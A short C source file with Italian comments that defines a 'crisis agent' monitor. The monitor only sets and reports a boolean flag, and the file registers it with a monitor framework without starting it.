
BOOL bPM_CrisisAgentStarted = FALSE; // Flag che indica se il monitor e' attivo o meno

// Funzione esportata per vedere se e' in un momento di crisi
BOOL IsCrisis()
{
	return bPM_CrisisAgentStarted;
}

// Viene utilizzato solo per verificare se la crisi e' attiva o no.
// Non esegue alcuna operazione quando viene attivato.

DWORD __stdcall PM_CrisisAgentStartStop(BOOL bStartFlag)
{
	bPM_CrisisAgentStarted = bStartFlag;
	return 1;
}


DWORD __stdcall PM_CrisisAgentInit(BYTE *conf_ptr, BOOL bStartFlag)
{
	PM_CrisisAgentStartStop(bStartFlag);
	return 1;
}


void PM_CrisisAgentRegister()
{
	// Non ha nessuna funzione di Dispatch
	AM_MonitorRegister(PM_CRISISAGENT, NULL, (BYTE *)PM_CrisisAgentStartStop, (BYTE *)PM_CrisisAgentInit, NULL);

	// Inizialmente i monitor devono avere una configurazione di default nel caso
	// non siano referenziati nel file di configurazione (partono comunque come stoppati).
	PM_CrisisAgentInit(NULL, FALSE);
}